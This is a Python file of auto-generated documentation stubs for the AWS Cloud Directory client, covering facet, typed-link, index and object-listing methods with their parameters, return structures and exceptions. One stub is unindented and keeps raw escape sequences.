        * FacetStyle (string) -- Either Static or Dynamic. For static
          facets, all attributes must be defined in the schema; for
          dynamic facets, attributes can be defined during data plane
          operations.

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetNotFoundException

    Example::

        response = client.get_facet(
            SchemaArn='string',
            Name='string'
        )
    """
    pass
def get_link_attributes(DirectoryArn=None, TypedLinkSpecifier=None, AttributeNames=None, ConsistencyLevel=None):
    """
    Retrieve attributes that are associated with a typed link.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where the typed link resides. For
        more information, see arns or Typed Links.
    :type TypedLinkSpecifier: dict
    :param TypedLinkSpecifier: [REQUIRED] Allows a typed link specifier to
        be accepted as input. Structure:

        * TypedLinkFacet (dict) -- [REQUIRED] Identifies the typed link
          facet associated with the typed link:

          * SchemaArn (string) -- [REQUIRED] The ARN associated with the
            schema. For more information, see arns.
          * TypedLinkName (string) -- [REQUIRED] The unique name of the
            typed link facet.

        * SourceObjectReference (dict) -- [REQUIRED] Identifies the source
          object the typed link attaches to. ``Selector`` (string) may be
          ``$ObjectIdentifier``, a ``/some/path`` selector, or a
          ``#SomeBatchReference``.
        * TargetObjectReference (dict) -- [REQUIRED] Identifies the target
          object the typed link attaches to. Same ``Selector`` structure.
        * IdentityAttributeValues (list) -- [REQUIRED] Identifies the
          attribute values of the link. Each element:

          * AttributeName (string) -- [REQUIRED] The attribute name of the
            typed link.
          * Value (dict) -- [REQUIRED] The value for the typed link, as
            one of ``StringValue`` (string), ``BinaryValue`` (bytes),
            ``BooleanValue`` (boolean), ``NumberValue`` (string), or
            ``DatetimeValue`` (datetime).
    :type AttributeNames: list
    :param AttributeNames: [REQUIRED] A list of attribute names (strings)
        whose values will be retrieved.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: The consistency level at which to retrieve
        the attributes on a typed link ('SERIALIZABLE'|'EVENTUAL').

    :rtype: dict
    :return: ::

        {
            'Attributes': [
                {
                    'Key': {
                        'SchemaArn': 'string',
                        'FacetName': 'string',
                        'Name': 'string'
                    },
                    'Value': {
                        'StringValue': 'string',
                        'BinaryValue': b'bytes',
                        'BooleanValue': True|False,
                        'NumberValue': 'string',
                        'DatetimeValue': datetime(2015, 1, 1)
                    }
                },
            ]
        }

        Attributes (list) -- The attributes associated with the typed
        link. Each element is a key/value pair:

        * Key (dict) -- The key of the attribute:

          * SchemaArn (string) -- The ARN of the schema that contains the
            facet and attribute.
          * FacetName (string) -- The name of the facet the attribute
            exists within.
          * Name (string) -- The name of the attribute.

        * Value (dict) -- The value of the attribute, as one of
          ``StringValue`` (string), ``BinaryValue`` (bytes),
          ``BooleanValue`` (boolean), ``NumberValue`` (string), or
          ``DatetimeValue`` (datetime).

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetValidationException

    Example::

        response = client.get_link_attributes(
            DirectoryArn='string',
            TypedLinkSpecifier={
                'TypedLinkFacet': {
                    'SchemaArn': 'string',
                    'TypedLinkName': 'string'
                },
                'SourceObjectReference': {'Selector': 'string'},
                'TargetObjectReference': {'Selector': 'string'},
                'IdentityAttributeValues': [
                    {
                        'AttributeName': 'string',
                        'Value': {
                            'StringValue': 'string',
                            'BinaryValue': b'bytes',
                            'BooleanValue': True|False,
                            'NumberValue': 'string',
                            'DatetimeValue': datetime(2015, 1, 1)
                        }
                    },
                ]
            },
            AttributeNames=['string'],
            ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
        )
    """
    pass
def get_object_attributes(DirectoryArn=None, ObjectReference=None, ConsistencyLevel=None, SchemaFacet=None, AttributeNames=None):
    """
    Retrieves attributes within a facet that are associated with an object.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where the object resides.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] ``{'Selector': 'string'}`` identifying
        the object whose attributes will be retrieved. A selector is either an
        ``$ObjectIdentifier``, a ``/path/from/root``, or a ``#BatchReference``.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: ``'SERIALIZABLE'`` or ``'EVENTUAL'`` — the
        consistency level at which to retrieve the attributes on an object.
    :type SchemaFacet: dict
    :param SchemaFacet: [REQUIRED] ``{'SchemaArn': 'string', 'FacetName':
        'string'}`` identifying the facet whose attributes will be retrieved.
        The SchemaArn must have no minor version component.
    :type AttributeNames: list
    :param AttributeNames: [REQUIRED] List of attribute names (strings) whose
        values will be retrieved.
    :rtype: dict
    :return: {
        'Attributes': [
            {
                'Key': {
                    'SchemaArn': 'string',
                    'FacetName': 'string',
                    'Name': 'string'
                },
                'Value': {
                    'StringValue': 'string',
                    'BinaryValue': b'bytes',
                    'BooleanValue': True|False,
                    'NumberValue': 'string',
                    'DatetimeValue': datetime(2015, 1, 1)
                }
            },
        ]
        }

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, FacetValidationException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def get_object_information(DirectoryArn=None, ObjectReference=None, ConsistencyLevel=None):
    """
    Retrieves metadata about an object.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory being retrieved.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] ``{'Selector': 'string'}`` — a reference
        to the object. A selector is either an ``$ObjectIdentifier``, a
        ``/path/from/root``, or a ``#BatchReference``.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: ``'SERIALIZABLE'`` or ``'EVENTUAL'`` — the
        consistency level at which to retrieve the object information.
    :rtype: dict
    :return: {
        'SchemaFacets': [
            {
                'SchemaArn': 'string',
                'FacetName': 'string'
            },
        ],
        'ObjectIdentifier': 'string'
        }

    ``SchemaFacets`` lists the facets attached to the object; although minor
    version information is omitted, the most recently applied minor version of
    each Facet is in effect (see GetAppliedSchemaVersion).

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def get_paginator(operation_name=None):
    """
    Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name, identical to the client method
        name. For example, if the method is ``create_foo`` (normally invoked as
        ``client.create_foo(**kwargs)``) and that operation is paginatable, use
        ``client.get_paginator('create_foo')``.
    :rtype: L{botocore.paginate.Paginator}
    :return: A paginator object.
    """
    # Documentation stub only — pagination is handled by botocore at runtime.
    pass
def get_schema_as_json(SchemaArn=None):
    """
    Retrieves a JSON representation of the schema. See JSON Schema Format for
    more information.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The ARN of the schema to retrieve.
    :rtype: dict
    :return: {
        'Name': 'string',
        'Document': 'string'
        }

    ``Name`` is the name of the retrieved schema; ``Document`` is its JSON
    representation.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def get_typed_link_facet_information(SchemaArn=None, Name=None):
    """
    Returns the identity attribute order for a specific TypedLinkFacet.
    For more information, see Typed Links.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the schema. For more information, see arns.
    :type Name: string
    :param Name: [REQUIRED] The unique name of the typed link facet.
    :rtype: dict
    :return: {
        'IdentityAttributeOrder': [
            'string',
        ]
        }

    ``IdentityAttributeOrder`` lists identity attributes from most to least
    significant. Range filters on typed links are interpreted in this facet
    order (not the order supplied to API calls); inexact ranges must come
    last, and attributes without a range match the entire range.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidNextTokenException, FacetNotFoundException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def get_waiter(waiter_name=None):
    """
    Returns an object that can wait for some condition.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. See the waiters section
        of the service docs for a list of available waiters.
    :rtype: botocore.waiter.Waiter
    """
    # Documentation stub only — waiters are constructed by botocore at runtime.
    pass
def list_applied_schema_arns(DirectoryArn=None, SchemaArn=None, NextToken=None, MaxResults=None):
    """
    Lists schema major versions applied to a directory. If SchemaArn is
    provided, lists the minor version.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory you are listing.
    :type SchemaArn: string
    :param SchemaArn: When supplied, the response lists all minor version ARNs
        for this major version.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: {
        'SchemaArns': [
            'string',
        ],
        'NextToken': 'string'
        }

    ``SchemaArns`` holds the ARNs of schemas applied to the directory;
    ``NextToken`` is the pagination token for the next page.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidNextTokenException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def list_attached_indices(DirectoryArn=None, TargetReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
    """
    Lists indices attached to the specified object.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory.
    :type TargetReference: dict
    :param TargetReference: [REQUIRED] ``{'Selector': 'string'}`` referencing
        the object that has indices attached. A selector is either an
        ``$ObjectIdentifier``, a ``/path/from/root``, or a ``#BatchReference``.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: ``'SERIALIZABLE'`` or ``'EVENTUAL'`` — the
        consistency level to use for this operation.
    :rtype: dict
    :return: {
        'IndexAttachments': [
            {
                'IndexedAttributes': [
                    {
                        'Key': {
                            'SchemaArn': 'string',
                            'FacetName': 'string',
                            'Name': 'string'
                        },
                        'Value': {
                            'StringValue': 'string',
                            'BinaryValue': b'bytes',
                            'BooleanValue': True|False,
                            'NumberValue': 'string',
                            'DatetimeValue': datetime(2015, 1, 1)
                        }
                    },
                ],
                'ObjectIdentifier': 'string'
            },
        ],
        'NextToken': 'string'
        }

    For ListAttachedIndices, each attachment's ``ObjectIdentifier`` is the
    identifier of the index attached to the object (i.e. the object on the
    opposite side of the attachment from the query target).

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def list_development_schema_arns(NextToken=None, MaxResults=None):
    """
    Retrieves each Amazon Resource Name (ARN) of schemas in the development
    state.

    See also: AWS API Documentation

    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: {
        'SchemaArns': [
            'string',
        ],
        'NextToken': 'string'
        }

    ``SchemaArns`` holds the ARNs of retrieved development schemas;
    ``NextToken`` is the pagination token for the next page.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidNextTokenException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def list_directories(NextToken=None, MaxResults=None, state=None):
    """
    Lists directories created within an account.

    See also: AWS API Documentation

    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :type state: string
    :param state: ``'ENABLED'``, ``'DISABLED'``, or ``'DELETED'`` — restricts
        the listing to directories in that state.
    :rtype: dict
    :return: {
        'Directories': [
            {
                'Name': 'string',
                'DirectoryArn': 'string',
                'State': 'ENABLED'|'DISABLED'|'DELETED',
                'CreationDateTime': datetime(2015, 1, 1)
            },
        ],
        'NextToken': 'string'
        }

    ``Directories`` lists, in paginated fashion, every directory associated
    with the account: each entry carries the directory name, its ARN (see
    arns), its state, and its creation timestamp.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, InvalidNextTokenException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def list_facet_attributes(SchemaArn=None, Name=None, NextToken=None, MaxResults=None):
    """
    Retrieves attributes attached to the facet.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The ARN of the schema where the facet resides.
    :type Name: string
    :param Name: [REQUIRED] The name of the facet whose attributes will be
        retrieved.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: {
        'Attributes': [
            {
                'Name': 'string',
                'AttributeDefinition': {
                    'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
                    'DefaultValue': {
                        'StringValue': 'string',
                        'BinaryValue': b'bytes',
                        'BooleanValue': True|False,
                        'NumberValue': 'string',
                        'DatetimeValue': datetime(2015, 1, 1)
                    },
                    'IsImmutable': True|False,
                    'Rules': {
                        'string': {
                            'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
                            'Parameters': {
                                'string': 'string'
                            }
                        }
                    }
                },
                'AttributeReference': {
                    'TargetFacetName': 'string',
                    'TargetAttributeName': 'string'
                },
                'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
            },
        ],
        'NextToken': 'string'
        }

    Each facet attribute consists of either a definition
    (``AttributeDefinition``: type, optional default value, mutability flag,
    and validation rules) or a reference (``AttributeReference``: target facet
    and attribute names). See Attribute References for more information.
    ``RequiredBehavior`` states whether the attribute is required.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException, FacetNotFoundException,
    InvalidNextTokenException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def list_facet_names(SchemaArn=None, NextToken=None, MaxResults=None):
    """
    Retrieves the names of facets that exist in a schema.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) to retrieve
        facet names from.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: {
        'FacetNames': [
            'string',
        ],
        'NextToken': 'string'
        }

    ``FacetNames`` holds the names of facets within the schema; ``NextToken``
    is the pagination token for the next page.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidNextTokenException.
    """
    # Documentation stub only — the real call is dispatched by the generated client.
    pass
def list_incoming_typed_links(DirectoryArn=None, ObjectReference=None, FilterAttributeRanges=None, FilterTypedLink=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Returns a paginated list of all the incoming TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.list_incoming_typed_links(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
FilterAttributeRanges=[
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
FilterTypedLink={
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where you want to list the typed links.\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nReference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type FilterAttributeRanges: list
:param FilterAttributeRanges: Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type FilterTypedLink: dict
:param FilterTypedLink: Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level to execute the request at.
:rtype: dict
ReturnsResponse Syntax
{
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LinkSpecifiers (list) --
Returns one or more typed link specifiers as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def list_index(DirectoryArn=None, RangesOnIndexedValues=None, IndexReference=None, MaxResults=None, NextToken=None, ConsistencyLevel=None):
    """
    Lists objects attached to the specified index.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory that the index exists in.
    :type RangesOnIndexedValues: list
    :param RangesOnIndexedValues: Specifies the ranges of indexed values that you want
        to query. Each item is a dict with an ``AttributeKey``
        (``SchemaArn``, ``FacetName``, ``Name`` — all [REQUIRED]) and a ``Range``
        holding ``StartMode``/``EndMode`` (one of ``'FIRST'``, ``'LAST'``,
        ``'LAST_BEFORE_MISSING_VALUES'``, ``'INCLUSIVE'``, ``'EXCLUSIVE'``) and
        ``StartValue``/``EndValue`` typed-attribute dicts (``StringValue``,
        ``BinaryValue``, ``BooleanValue``, ``NumberValue``, ``DatetimeValue``).
    :type IndexReference: dict
    :param IndexReference: [REQUIRED] The reference to the index to list, as
        ``{'Selector': 'string'}``. A selector can be an object identifier
        (``$ObjectIdentifier``), a path (``/some/path``), or a batch reference
        (``#SomeBatchReference``).
    :type MaxResults: integer
    :param MaxResults: The maximum number of objects in a single page to retrieve
        from the index during a request.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: The consistency level to execute the request at
        (``'SERIALIZABLE'`` or ``'EVENTUAL'``).
    :rtype: dict
    :return: A dict of the form::

        {
            'IndexAttachments': [
                {
                    'IndexedAttributes': [
                        {
                            'Key': {
                                'SchemaArn': 'string',
                                'FacetName': 'string',
                                'Name': 'string'
                            },
                            'Value': {
                                'StringValue': 'string',
                                'BinaryValue': b'bytes',
                                'BooleanValue': True|False,
                                'NumberValue': 'string',
                                'DatetimeValue': datetime(2015, 1, 1)
                            }
                        },
                    ],
                    'ObjectIdentifier': 'string'
                },
            ],
            'NextToken': 'string'
        }

        ``ObjectIdentifier`` is the identifier of the object attached to the index
        (the object on the opposite side of the attachment specified in the query).

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, RetryableConflictException, FacetValidationException,
    ValidationException, LimitExceededException, AccessDeniedException,
    DirectoryNotEnabledException, InvalidNextTokenException,
    ResourceNotFoundException, NotIndexException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
def list_managed_schema_arns(SchemaArn=None, NextToken=None, MaxResults=None):
    """
    Lists the major version families of each managed schema. If a major version
    ARN is provided as SchemaArn, the minor version revisions in that family are
    listed instead.

    See also: AWS API Documentation.

    :type SchemaArn: string
    :param SchemaArn: The response for ListManagedSchemaArns. When this parameter
        is used, all minor version ARNs for a major version are listed.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: A dict of the form::

        {
            'SchemaArns': [
                'string',
            ],
            'NextToken': 'string'
        }

        ``SchemaArns`` holds the ARNs for all AWS managed schemas.

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, ValidationException, AccessDeniedException,
    ResourceNotFoundException, InvalidNextTokenException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
def list_object_attributes(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None, FacetFilter=None):
    """
    Lists all attributes that are associated with an object.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where the object resides.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] The reference that identifies the object
        whose attributes will be listed, as ``{'Selector': 'string'}``. A selector
        can be an object identifier (``$ObjectIdentifier``), a path
        (``/some/path``), or a batch reference (``#SomeBatchReference``).
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a single
        call. This is an approximate number.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: Represents the manner and timing in which the
        successful write or update of an object is reflected in a subsequent read
        operation of that same object (``'SERIALIZABLE'`` or ``'EVENTUAL'``).
    :type FacetFilter: dict
    :param FacetFilter: Used to filter the list of object attributes that are
        associated with a certain facet. A dict with ``SchemaArn`` (the ARN of the
        schema that contains the facet, with no minor component) and ``FacetName``.
    :rtype: dict
    :return: A dict of the form::

        {
            'Attributes': [
                {
                    'Key': {
                        'SchemaArn': 'string',
                        'FacetName': 'string',
                        'Name': 'string'
                    },
                    'Value': {
                        'StringValue': 'string',
                        'BinaryValue': b'bytes',
                        'BooleanValue': True|False,
                        'NumberValue': 'string',
                        'DatetimeValue': datetime(2015, 1, 1)
                    }
                },
            ],
            'NextToken': 'string'
        }

        ``Attributes`` maps attribute keys to attribute values for the object.

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, RetryableConflictException, ValidationException,
    LimitExceededException, AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, InvalidNextTokenException,
    FacetValidationException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
def list_object_children(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
    """
    Returns a paginated list of child objects that are associated with a given
    object.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where the object resides.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] The reference that identifies the object
        for which child objects are being listed, as ``{'Selector': 'string'}``.
        A selector can be an object identifier (``$ObjectIdentifier``), a path
        (``/some/path``), or a batch reference (``#SomeBatchReference``).
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a single
        call. This is an approximate number.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: Represents the manner and timing in which the
        successful write or update of an object is reflected in a subsequent read
        operation of that same object (``'SERIALIZABLE'`` or ``'EVENTUAL'``).
    :rtype: dict
    :return: A dict of the form::

        {
            'Children': {
                'string': 'string'
            },
            'NextToken': 'string'
        }

        ``Children`` is a map with the LinkName as key and the ObjectIdentifier
        as value.

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, RetryableConflictException, ValidationException,
    LimitExceededException, AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, InvalidNextTokenException, NotNodeException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
